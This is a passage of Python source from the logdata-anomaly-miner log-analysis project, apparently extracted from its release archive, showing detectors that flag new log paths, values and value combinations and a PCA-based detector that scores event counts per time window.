logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False for path in log_atom.parser_match.get_match_dictionary().keys(): if path not in self.known_path_set: unknown_path_list.append(path) if self.learn_mode: self.known_path_set.add(path) self.log_learned_paths += 1 self.log_new_learned_paths.append(path) if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) if unknown_path_list: original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) if self.output_logline: sorted_log_lines = [log_atom.parser_match.match_element.annotate_match("") + os.linesep + repr( unknown_path_list) + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [repr(unknown_path_list)] analysis_component = {"AffectedLogAtomPaths": list(unknown_path_list)} event_data = {"AnalysisComponent": analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", "New path(s) detected", sorted_log_lines, event_data, log_atom, self) self.log_success += 1 return True def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" PersistenceUtil.store_json(self.persistence_file_name, sorted(list(self.known_path_set))) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def load_persistence_data(self): """Load the persistence data from storage.""" persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: self.known_path_set = set(persistence_data) logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__) def allowlist_event(self, event_type, event_data, allowlisting_data): """Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = "Allowlisting data not understood by this detector" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if not isinstance(event_data, str): msg = "event_data has to be of type string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.known_path_set.add(event_data) return f"Allowlisted path(s) {event_data} in {event_type}." def log_statistics(self, component_name): """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %d new paths in the last 60 minutes.", component_name, self.log_success, self.log_total, self.log_learned_paths) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %d new paths in the last 60 minutes. Following new paths" " were learned: %s", component_name, self.log_success, self.log_total, self.log_learned_paths, self.log_new_learned_paths) self.log_success = 0 self.log_total = 0 self.log_learned_paths = 0 self.log_new_learned_paths = [] NewMatchPathValueComboDetector.py000066400000000000000000000345151500476301700373230ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This file defines the basic NewMatchPathValueComboDetector detector. It extracts values from LogAtoms and check, if the value combination was already seen before. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os import logging from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, \ STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class NewMatchPathValueComboDetector( AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface, PersistableComponentInterface): """This class creates events when a new value combination for a given list of match data paths were found.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, persistence_id="Default", allow_missing_values_flag=False, learn_mode=False, output_logline=True, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param persistence_id name of persistence file. @param allow_missing_values_flag when set to True, the detector will also use matches, where one of the paths from target_path_list does not refer to an existing parsed data object. @param learn_mode when set to True, this detector will report a new value only the first time before including it in the known values set automatically. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None super().__init__( aminer_config=aminer_config, target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers, persistence_id=persistence_id, allow_missing_values_flag=allow_missing_values_flag, learn_mode=learn_mode, output_logline=output_logline, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list, mutable_default_args=["log_resource_ignore_list"] ) if not self.target_path_list: msg = "target_path_list must not be None or empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.log_learned_path_value_combos = 0 self.log_new_learned_values = [] self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) self.known_values_set = set() self.load_persistence_data() PersistenceUtil.add_persistable_component(self) def load_persistence_data(self): """Load the persistence data from storage.""" persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: # Set and tuples were stored as list of lists. Transform the inner lists to tuples to allow hash operation needed by set. self.known_values_set = {tuple(record) for record in persistence_data} logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__) def receive_atom(self, log_atom): """Receive on parsed atom and the information about the parser match. @return True if a value combination was extracted and checked against the list of known combinations, no matter if the checked values were new or not. """ for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return False self.log_total += 1 if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False match_dict = log_atom.parser_match.get_match_dictionary() match_value_list = [] for target_path in self.target_path_list: match_element = match_dict.get(target_path) if match_element is None: if not self.allow_missing_values_flag: return False match_value_list.append(None) else: matches = [] if isinstance(match_element, list): matches = match_element else: matches.append(match_element) for match_element in matches: match_value_list.append(match_element.match_object) match_value_tuple = tuple(match_value_list) affected_log_atom_values = [] for match_value in match_value_list: if isinstance(match_value, bytes): match_value = match_value.decode(AminerConfig.ENCODING) affected_log_atom_values.append(str(match_value)) if match_value_tuple not in self.known_values_set: if self.learn_mode: self.known_values_set.add(match_value_tuple) self.log_learned_path_value_combos += 1 self.log_new_learned_values.append(match_value_tuple) if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max( self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) analysis_component = {"AffectedLogAtomPaths": self.target_path_list, "AffectedLogAtomValues": affected_log_atom_values} event_data = {"AnalysisComponent": analysis_component} try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) if self.output_logline: original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [str(match_value_tuple) + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [str(match_value_tuple)] for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", "New value combination(s) detected", sorted_log_lines, event_data, log_atom, self) self.log_success += 1 return True def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" try: # Sort the known_values_set before storing as json. This improves the deterministic behavior / reproducible results. # The Lambda function is only used to allow sorting of tuple values which contain None. PersistenceUtil.store_json(self.persistence_file_name, sorted(list(self.known_values_set), key=lambda L: tuple(el if el is not None else b'-' for el in L))) except TypeError: PersistenceUtil.store_json(self.persistence_file_name, list(self.known_values_set)) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def allowlist_event(self, event_type, event_data, allowlisting_data): """Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = "Allowlisting data not understood by this detector" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if not isinstance(event_data, tuple) or len(event_data) != len(self.target_path_list): msg = "event_data has to be of type tuple." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if not self.allow_missing_values_flag and None in event_data: msg = "event_data must not have None values if allow_missing_values_flag is False." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.known_values_set.add(event_data) return f"Allowlisted path(s) {', '.join(self.target_path_list)} with {event_data}." def add_to_persistency_event(self, event_type, event_data): """Add or overwrite the information of event_data to the persistence of component_name. @return a message with information about the addition to the persistence. @throws Exception when the addition of this special event using given event_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if not isinstance(event_data, list) or len(event_data) != len(self.target_path_list): msg = "Event_data has the wrong format." \ "The supported format is [value_1, value_2, ..., value_n] where n is the number of analyzed paths." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) match_value_list = [] for match_element in event_data: if match_element is None: if not self.allow_missing_values_flag: msg = "Empty entry detected in event_data." \ "Please fill entry or set parameter allow_missing_values_flag to true." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) match_value_list.append(None) else: match_value_list.append(bytes(match_element, "utf-8")) match_value_tuple = tuple(match_value_list) if match_value_tuple not in self.known_values_set: self.known_values_set.add(match_value_tuple) self.log_learned_path_value_combos += 1 self.log_new_learned_values.append(match_value_tuple) return f"Added values [{', '.join(event_data)}] of paths [{', '.join(self.target_path_list)}] to the persistence." def log_statistics(self, component_name): """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %d new value combinations in the last 60 minutes.", component_name, self.log_success, self.log_total, self.log_learned_path_value_combos) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %d new value combinations in the last 60 minutes." " Following new value combinations were learned: %s", component_name, self.log_success, self.log_total, self.log_learned_path_value_combos, self.log_new_learned_values) self.log_success = 0 self.log_total = 0 self.log_learned_path_value_combos = 0 self.log_new_learned_values = [] NewMatchPathValueDetector.py000066400000000000000000000262601500476301700363410ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines a detector for new values in a data path. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os import logging from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, \ STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class NewMatchPathValueDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface, PersistableComponentInterface): """This class creates events when new values for a given data path were found.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, persistence_id="Default", learn_mode=False, output_logline=True, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param persistence_id name of persistence file. @param learn_mode when set to True, this detector will report a new value only the first time before including it in the known values set automatically. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None super().__init__( aminer_config=aminer_config, target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers, persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list, mutable_default_args=["log_resource_ignore_list"] ) if not self.target_path_list: msg = "target_path_list must not be None or empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.log_learned_path_values = 0 self.log_new_learned_values = [] self.known_values_set = set() self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) self.load_persistence_data() def receive_atom(self, log_atom): """Receive a log atom from a source.""" for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return False self.log_total += 1 if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time match_dict = log_atom.parser_match.get_match_dictionary() if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False for target_path in self.target_path_list: match = match_dict.get(target_path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) affected_log_atom_values = [] for match in matches: if match.match_object not in self.known_values_set: if self.learn_mode: self.known_values_set.add(match.match_object) self.log_learned_path_values += 1 self.log_new_learned_values.append(match.match_object) if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) if isinstance(match.match_object, bytes): affected_log_atom_values.append(match.match_object.decode(AminerConfig.ENCODING)) else: affected_log_atom_values.append(str(match.match_object)) if len(affected_log_atom_values) > 0: analysis_component = {"AffectedLogAtomPaths": [target_path], "AffectedLogAtomValues": affected_log_atom_values} if isinstance(match_dict.get(target_path), list): res = {target_path: affected_log_atom_values} else: res = {target_path: match_dict.get(target_path).match_object} if isinstance(res[target_path], bytes): res[target_path] = res[target_path].decode(AminerConfig.ENCODING) try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) if self.output_logline: original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [str(res) + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [str(res)] event_data = {"AnalysisComponent": analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", "New value(s) detected", sorted_log_lines, event_data, log_atom, self) self.log_success += 1 return True def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" data = list(self.known_values_set) bts = list(filter(lambda x: isinstance(x, bytes), data)) other = list(filter(lambda x: not isinstance(x, bytes), data)) PersistenceUtil.store_json(self.persistence_file_name, sorted(other) + sorted(bts)) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def load_persistence_data(self): """Load the persistence data from storage.""" PersistenceUtil.add_persistable_component(self) persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: self.known_values_set = set(persistence_data) logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__) def allowlist_event(self, event_type, event_data, allowlisting_data): """Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = "Allowlisting data not understood by this detector" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if not isinstance(event_data, bytes): msg = "event_data has to be of type bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.known_values_set.add(event_data) return f"Allowlisted path(s) {', '.join(self.target_path_list)} with {event_data.decode()}." def log_statistics(self, component_name): """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %d new values in the last 60 minutes.", component_name, self.log_success, self.log_total, self.log_learned_path_values) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %d new values in the last 60 minutes." " Following new value combinations were learned: %s", component_name, self.log_success, self.log_total, self.log_learned_path_values, self.log_new_learned_values) self.log_success = 0 self.log_total = 0 self.log_learned_path_values = 0 self.log_new_learned_values = [] logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/PCADetector.py000066400000000000000000000520061500476301700335000ustar00rootroot00000000000000"""This module defines a PCA-detector for event and value counts. The component detects anomalies by creating an Event-Count-Matrix for given time-windows to calculate an anomaly score for new time windows afterwards by using the reconstruction error from the inverse-transformation with restricted components of the Principal-Component-Analysis (PCA). This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import copy import numpy as np import logging import os from aminer import AminerConfig from aminer.AminerConfig import DEBUG_LOG_NAME, STAT_LEVEL, STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX, \ KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD from aminer.AnalysisChild import AnalysisContext from aminer.util import PersistenceUtil from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class PCADetector(AtomHandlerInterface, TimeTriggeredComponentInterface, PersistableComponentInterface): """This class creates events if event or value occurrence counts are outliers in PCA space.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, window_size, min_anomaly_score, min_variance, num_windows, persistence_id="Default", learn_mode=False, output_logline=True, ignore_list=None, constraint_list=None, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed as separate dimensions. When no paths are specified, the events given by the full path list are analyzed (one dimension). @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param window_size the length of the time window for counting in seconds. @param min_anomaly_score the minimum computed outlier score for reporting anomalies. Scores are scaled by training data, i.e., reasonable minimum scores are >1 to detect outliers with respect to currently trained PCA matrix. @param min_variance the minimum variance covered by the principal components in range [0, 1]. @param num_windows the number of time windows in the sliding window approach. Total covered time span = window_size * num_windows. @param persistence_id name of persistence file. @param learn_mode specifies whether new count measurements are added to the PCA count matrix. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable. @param constraint_list list of paths that have to be present in the log atom to be analyzed. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None super().__init__( mutable_default_args=["ignore_list", "constraint_list", "log_resource_ignore_list"], aminer_config=aminer_config, target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers, window_size=window_size, min_anomaly_score=min_anomaly_score, min_variance=min_variance, num_windows=num_windows, persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline, ignore_list=ignore_list, constraint_list=constraint_list, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list ) if not self.target_path_list: msg = "target_path_list must not be empty or None." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if num_windows < 3: msg = "num_windows must be greater than 2." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.first_log = True self.start_time = 0 self.event_count_matrix = [] self.feature_list = [] self.ecm = None self.log_windows = 0 self.pca_ecm = None self.eigen_vectors = None # number of components (n_comp): how many components should be used for reconstruction self.n_comp = None # Calculate Anomaly-Score (Reconstruction Error) for the whole dataset self.loss = None self.event_count_vector = {} self.persistence_file_name = AminerConfig.build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) self.load_persistence_data() def receive_atom(self, log_atom): """Receive parsed atom and the information about the parser match.""" for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return False if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time parser_match = log_atom.parser_match self.log_total += 1 if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False # Skip paths from ignore list. for ignore_path in self.ignore_list: if ignore_path in parser_match.get_match_dictionary().keys(): return False # get the timestamp of the first log to start the time-window-process (flag) if self.first_log: self.start_time = log_atom.get_timestamp() self.first_log = False current_time = log_atom.get_timestamp() while current_time >= (self.start_time + self.window_size): # PCA computation only possible when at least 3 vectors are present if len(self.event_count_matrix) >= 3 and all(all(len(x.values()) >= 2 for x in y.values()) for y in self.event_count_matrix): anomaly_score = self.anomaly_score() if anomaly_score > self.min_anomaly_score: try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) if self.output_logline: original_log_line_prefix = self.aminer_config.config_properties.get( CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [log_atom.parser_match.match_element.annotate_match("") + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [data] affected_paths = [] affected_values = [] affected_counts = [] for path, count_dict in self.event_count_vector.items(): affected_paths.append(path) affected_values.append(list(count_dict.keys())) affected_counts.append(list(count_dict.values())) analysis_component = {"AffectedLogAtomPaths": affected_paths, "AffectedLogAtomValues": affected_values, "AffectedValueCounts": affected_counts, "AnomalyScore": anomaly_score[0]} event_data = {"AnalysisComponent": analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", "PCA anomaly detected", sorted_log_lines, event_data, log_atom, self) self.log_windows += 1 # Add new values to matrix in learn mode if self.learn_mode is True: if len(self.event_count_matrix) >= self.num_windows: del self.event_count_matrix[0] self.event_count_matrix.append(copy.deepcopy(self.event_count_vector)) # PCA computation only possible when at least 3 vectors are present if len(self.event_count_matrix) >= 3 and all(all(len(x.values()) > 1 for x in y.values()) for y in self.event_count_matrix): self.repair_dict() self.compute_pca() if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) # Set window end time for next iteration self.start_time += self.window_size # Reset count vector for next time window self.reset_event_count_vector() if self.target_path_list is None or len(self.target_path_list) == 0: # Event is defined by the full path of log atom. constraint_path_flag = False for constraint_path in self.constraint_list: if parser_match.get_match_dictionary().get(constraint_path) is not None: constraint_path_flag = True break if not constraint_path_flag and self.constraint_list != []: return False log_event = tuple(parser_match.get_match_dictionary().keys()) if log_event in self.event_count_vector[""]: self.event_count_vector[""][log_event] += 1 else: self.event_count_vector[""][log_event] = 1 else: # Event is defined by values in target_path_list all_values_none = True for path in self.target_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: if isinstance(match.match_object, bytes): value = match.match_object.decode(AminerConfig.ENCODING) else: value = str(match.match_object) if value is not None: all_values_none = False if path in self.event_count_vector: if value in self.event_count_vector[path]: self.event_count_vector[path][value] += 1 else: self.event_count_vector[path][value] = 1 else: self.event_count_vector[path] = {value: 1} if all_values_none is True: return False self.log_success += 1 return True def compute_pca(self): """Carry out PCA on current event count matrix.""" # extract the features out of ecm into a list self.feature_list = [] for events in self.event_count_matrix[0].values(): for feature in events: self.feature_list.append(feature) # extract existing event_counts into array matrix = [] for event_count in self.event_count_matrix: row = [] for event in event_count.values(): row += list(event.values()) matrix.append(row) self.ecm = np.array(matrix) # Principal Component Analysis (PCA) normalized_ecm = (self.ecm - self.ecm.mean()) / self.ecm.std() covariance_matrix = np.cov(normalized_ecm.T) eigen_values, eigen_vectors = np.linalg.eigh(covariance_matrix) self.pca_ecm = normalized_ecm @ eigen_vectors self.eigen_vectors = eigen_vectors # number of components (n_comp): how many components should be used for reconstruction self.n_comp = self.get_n_comp(eigen_values) # PCA Inverse with only these components which describes the min_variance pca_inverse = self.pca_ecm[:, :self.n_comp] @ eigen_vectors[:self.n_comp, :] # Calculate Anomaly-Score (Reconstruction Error) for the whole dataset self.loss = np.sum((normalized_ecm - pca_inverse)**2, axis=1) def anomaly_score(self): """Calculate the anomalyscore for current event_count_vector.""" # convert the event_count_vector into an array ecv = self.vector2array() # normalize the ecv with the mean and std of learned ecm normalized_ecv = (ecv - self.ecm.mean()) / self.ecm.std() # reshape array into a 1-dimensional array normalized_ecv = normalized_ecv.reshape(1, -1) # calculate the reduced pca for current log-sequence with given eigen_vectors pca_ecv = normalized_ecv @ self.eigen_vectors # calculate the pca_inverse with reduced number of components / do reconstruction pca_inverse_ecv = pca_ecv[:, :self.n_comp] @ self.eigen_vectors[:self.n_comp, :] # calculate the reconstruction error / anomaly score loss = np.sum((normalized_ecv - pca_inverse_ecv)**2, axis=1) # scale the 